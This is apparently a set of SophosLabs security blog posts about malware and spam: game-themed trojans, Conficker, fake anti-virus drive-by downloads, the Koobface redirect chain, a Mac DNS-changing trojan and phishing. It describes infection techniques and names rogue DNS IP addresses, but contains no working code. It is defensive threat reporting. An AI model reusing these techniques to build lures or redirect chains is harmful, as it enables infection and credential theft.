SophosLabs blog

Following on from yesterday’s Pirates of Cape COD blog, we’ve seen more combat related malware this morning. Not quite such a well known name this time as the Call of Duty series, but “Battlefield Heroes” is a  free-to-play cartoon style shooter which is currently under development.

Troj/Bckdr-QQM disguises itself as Battlefield Heroes by using the game’s icon. To the best of my knowledge the full version of the game hasn’t been released yet, so any impatient fans may well think they’ve stumbled across gold. Trigger happy gamers who run the executable won’t find themselves locked and loaded for battle though, they’ll instead launch the Trojan which will attempt to steal MSN login information and connect to several file sharing websites. Doesn’t sound like much of a fun game does it?

As ever our advice is to remain vigilant, and remember you can never trust a file’s icon alone. If you’re not 100% sure that a file is from a legitimate source, don’t run it.

*images courtesy of battlefield-heroes.com

A reliable source has informed me that one of the hottest new games these days is “Call of Duty 5″ which retails at 30 pounds per license. However there exists a website from which one may buy a license for only $10. What a bargain, even if the Sterling is at its lowest against the dollar in a decade!

The catch is that this “service” is completely illegal. No Somalis on the high seas involved here … well, we do not think so anyway. The site (which has been blocked on our WS1000 web appliance) is fed by a pathetically simplistic, albeit chutzpah-displaying, Trojan called Troj/KeySteal-A which scouts a computer’s registry for license keys related to “Call of Duty” versions 5 and 4. These stolen keys are then sold on to gamers of low moral rectitude.

The irony of the matter is that the owner of this blatantly illegal website attempts to gain the moral high ground by denouncing those who “pay fraudulently” for the keys.

We urge all to resist the temptation to subscribe to these illegal services. If there is no market for them these ”entrepreneurs” would, perchance, have to actually work for a living.

 * Concept image of Call of Duty 5 courtesy of the official Call of Duty website.

** Pirate flag courtesy of current.com.

Earlier this week we witnessed the release of a new propagation technique that exploits a recent Microsoft vulnerability in the Windows Server Service. W32/Confick-A uses this security loop-hole to propagate its malicious DLL across user networks, generally making a real nuisance of itself. However after talking to some of my colleagues in our Technical Support department it seems that some users have suffered more pain than they should have at the hands of this worm.

W32/Confick-A (also detected proactively using Behavioural Genotype technology as Mal/Conficker-A) will be prevented from spreading across the network by our buffer overflow detection technology which detects the worm’s attack on a running copy of the SVCHost.exe process and prevents execution of the exploit. Other logs received from users show that infection can be prevented at an even earlier stage by HIPS runtime suspicious behaviour detection. HIPS/FileMod-006 has been seen to detect the worm performing one of its first behaviours and terminating the malicious process before it even attempts to spread.

Of course such a level of protection can only be achieved with the correct software configuration, however, unfortunately it seems that some users are still using HIPS runtime behaviour detection and buffer overflow protection (BOPS) in the Alert Only setting. In this configuration the malware will be detected but not terminated which is a real shame because had SAV been allowed to take action against this worm using HIPS and BOPS, users would not have become infected and would not have had to make recourse to the advanced SAV cleanup IDE.

To close, this incident with W32/Confick-A is yet another reminder of the importance of keeping up to date with security patches. The patch for the vulnerability used by W32/Confick-A was released in October and SophosLabs issued our own advisory and risk assessment shortly afterwards.

Earlier this week we became aware of YAFAT (yet another fake alert trojan family), this time being distributed via drive-by installs from compromised web sites.

Vulnerable sites are having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending links to the malicious web page.

Aside from keywords, the malicious pages also contain a heavily obfuscated JavaScript (detected as Mal/ObfJS-AL). The purpose of the script is to silently redirect the user to another URL (which collects referrer and keyword details), from where they are redirected to the fake alert distribution site.

The victim is prompted to download and install an executable (install.exe) which is actually a Trojan downloader (detected as Troj/Dloadr-CBA). Take note of the characteristic yellow and black striped icon - I suspect we are going to see a lot of this family over coming weeks.

Once running, install.exe downloads and installs the Winweb Security fake alert malware.

Detection for the Winweb Security malware itself has been added as Troj/FakeAV-GX. As with other fake AV families, it is likely that we will see many variants of this family (in fact, as I write this I see we have already started to see some). So, additional generic detection has been added, and will shortly be published (Mal/FakeAV-O).

Finally, the Winweb Security malware is not in any way related to the legitimate firm WinWeb International Limited. Looking at a news item on their site, it would appear some people are making this mistake.

Two weeks ago we wrote about a significant drop in spam volumes caused by the shutdown of McColo hosting. There was no doubt that spam traffic will get back to its previous levels (if not higher) eventually. The question was — when?

Unfortunately, McColo made a brief comeback on November 15th, which gave enough time to Rustock botnet owners to reconfigure the botnet, resuming the control. It took them less than 10 days to put it back in the ”business”. 

Starting yesterday, the amount of spam coming to our traps has gone up 3 times (a 200% increase) .

Here is an example of a spam campaign it spews. A typical “Canadian Pharamacy” spam brough to you by the “good” guys from GlavMed affiliate network.

The spam volumes haven’t got back to where they were previously, but I don’t think we’ll wait long before publishing an updated graph here.

We’ve seen an increasing amount of Facebook worms over recent months, and the last few variants have started to reference other social networking sites, including MySpace. I saw the move to a broader spectrum of targets mirrored when I was investigating the following chain, and it led me to believe there’s a link between these worms and the current plague of “fake anti-virus” (aka “fake AV”) Trojans.

The chain starts off when you receive a message from someone you know in Facebook. The one I saw last week looked like this:

{your friend’s name} sent you a message.

Subject: is it u there?

“WOW
http://www.facebook.com/l.php?u=http://google.com%2Fsearch%3Fq%3Dcache…”

As you can see, the Facebook link is trying to direct you to a page that’s been cached in Google. In this instance Facebook actually knows that this isn’t a site you shouldn’t be visiting, and displays the following (click the image to expand it):

Still, I wanted to know what was there, so I jumped directly to the cached page. On first glance it looked innocuous enough, but on closer inspection of the source code it was a site that had been the subject of SQL injection, and was detected by us as Mal/BadSrc-C. The point of the injection was to redirect visitors silently to another site, and this is what I found there:

This script (detected by us as Mal/JSRedir-A) uses document.referrer to see what site directed you there, and it then passes you on to a different page accordingly. Which means that someone sent here after they clicked a link in Facebook will end up being shown a different page to someone who clicked on the same link in MySpace.

At the moment the sites pointed to all then take you via a 302 redirect to the same payload, but I’d expect to see people being filtered by the page to more targeted code soon. For now the page they point to is of the good old-fashioned “here’s a video, download a codec or software update so you can view it properly”. In this instance it’s trying to get you to install flash_update.exe, and the video it’s trying to show you is porn - I’ll visit it from a browser without Flash installed to spare you the gory details:

We detect this page as Mal/VidHtml-A and flash_update.exe as W32/Koobfa-Gen - running that executable gives you the following fake error message (because doing nothing at all would be suspicious):

Meanwhile in the background the worm starts running … and so the cycle begins again.

I promised to tie this together with the fake anti-virus Trojans, and so here goes: if I visit the root domain of the Mal/JSRedir-A page, I get a different variation of the “view this video” page, this one detected as Mal/VidHtml-B:

This page redirects me to another one, detected as Mal/VidHtml-C, which tries to download an executable called setup.exe from yet another remote location. This file is detected as Mal/EncPk-GA, and instead of being a Facebook work, this is a fake anti-virus Trojan - in fact it’s a component of the Zlob family, which is one of the oldest strains of this phenomenon.

Seeing different types of malware hosted on the same sites isn’t all that uncommon, and we’ve seen instances of quite varied families being seen together. This particular chain incorporates many of the major threats we’ve been seeing recently, allowing us (to some extent) to plot out a better map of who’s responsible for what - in this case, SQL injection, bogus video sites, fake anti-virus software, and Facebook worms. The addition of targets including MySpace, Bebo, hi5, and GeoCities shows the direction these particular malware authors seem to be heading.

We will soon add detection for a new Mac Trojan, nicely described by Jose Nazario of Arbor Networks. It will be detected as OSX/Jahlav-A. The Trojan comes as a key generator application MacAccess in a standard DMG disk image file, usually downloaded from a malicious website very similar to the websites hosting variants of OSX/RSPlug Trojans.

The difference is that this time the malware does not simply redirect the DNS settings to a rogue DNS server but connects to an IP address located in Netherlands to download additional piece of code and execute it.

Two identical files inside the DMG file, preinstall and preupgrade, are standard Unix shell scripts that contain additional uuencodede payloads. When decoded, the first layer is another shell script that sets up a cron job to run the file AdobeFlash in “/Library/Internet Plug-Ins” directory. This file is a copy of the initial preinstall/preupgrade scripts.

Initially, I thought that the downloading functionality can be used to recruit the infected Mac into a botnet, but the downloaded code functionality is identical to previous OSX/RSPlug variants. The additional piece of code is another uuencoded and slightly obfuscated shell script that eventually changes the local DNS settings to point to a couple of rogue DNS servers located in Ukraine, using IP addresses 85.255.112.6 and 85.255.112.127.

The new sample is one of several we have been seeing lately and shows that the Zlob gang is still very interested in infecting Macs.

As we have been saying on our blog recently spam volumes have been down for some. Others may be seeing an increase in spam though, especially for those individuals and companies whose contact details were published to various internet sites last week as part of the leak of BNP party membership lists.

The list currently hosted by Wikileaks contains 6131 entries with associated email addresses. Of those 6131 there are 5959 uniques email addresses most of which are either free or associated with ISPs.

In the chart I have tried to amalgamate addresses into groups e.g. Virgin = {Virgin, Ntlworld, blueyonder} etc. This was based on the first part of the domain.

Surprisingly, some of the email addresses seem to be individuals’ company addresses which may break their companies’ acceptable use policies. As has been noted in the news media there are some interesting occupations analyzing the email addresses also gives some interesting results:

• 17 gov.uk
• 15 ac.uk
• 9 sales@
• 5 .de (TLD of Germany)
• 1 .za (TLD of South Africa)

Rumour has it that the person(s) who leaked this information added some details spuriously.

The email addresses listed will undoubtedly be added to spammers lists of email addresses. Those mentioned in the list should look to upgrade their anti-spam software, then again this is the least of their worries.

Not only has the take down of McColo last week (link, link) caused a massive drop in worldwide spam levels, but it would also appear to have resulted in a big drop in the level of malware being spammed out as attachments.

Up until last week, we at SophosLabs had seen something of a resurgence in malware as an attachment in recent months, with huge numbers of malicious attachments from various malware families appearing on our spam traps, such as W32/Autorun-OG posing as fake UPS details, Troj/Agent-ICH as a fake eCard, Troj/Agent-HQK and Troj/Agent-IDO as bogus internet access suspension details.

However, over the last week, we have been seeing just the usual background radiation of W32/MyDoom’s, W32/Mytob’s and W32/NetSky’s.

It is unlikely that things will stay this quiet for long but we at SophosLabs appreciate the relative calm while it lasts.

This Saturday started quietly as expected so I had a chance to look at the BBC news headlines. One of the today’s headlines indicates that the UK Chancellor, Alistair Darling, is spending weekend adding the finishing touches to a package of tax cuts and increased public spending that should help the economy get out of the recession as soon as possible.

Going back to analyse some of the latest spam messages I came across this message, quite obviously not written by anybody from the government:

It is interesting to see how quickly are phishing gangs, though admittedly not very skillfully, catching up on the latest news. The recession has a definite impact on the type of spam messages we are seeing. Out with unique opportunities to make money from manipulating the values of penny stocks, in with helping people of my age group to cope with the difficulties of credit crunch.

Following the link in the email lands the browser on a page somewhat unusual for phishing. The “government” wants to know more about me to determine how big tax return can I get. It seems that men aged 31-35 are not included this time government giveaway and I find it quite disappointing. This page could either be used to collect more information for the identity theft, or simply just to make the page look a bit more legitimate, which I think is more likely in this case.

When I briefly looked at the page source code, to make sure that there are no nasty surprises in a format of malicious Javascript code I could immediately see that the page was adopted in a rush from at least 2 other phishing kits. The first indicator is the page title “Robobank - Complete” (spelling mistake of Rabobank). Further down in the HTML source, the style sheet is taken from another phishing target The Farmers and Merchants Bank of Central California. Finally the page footer contains the link to the corporate information page of Rabobank Americas.

If this phishing gang wants higher return on their emails, they will have to improve the quality of their pages. They can still consider themselves the trend setters in the genre of government phishing, despite their unskillful work.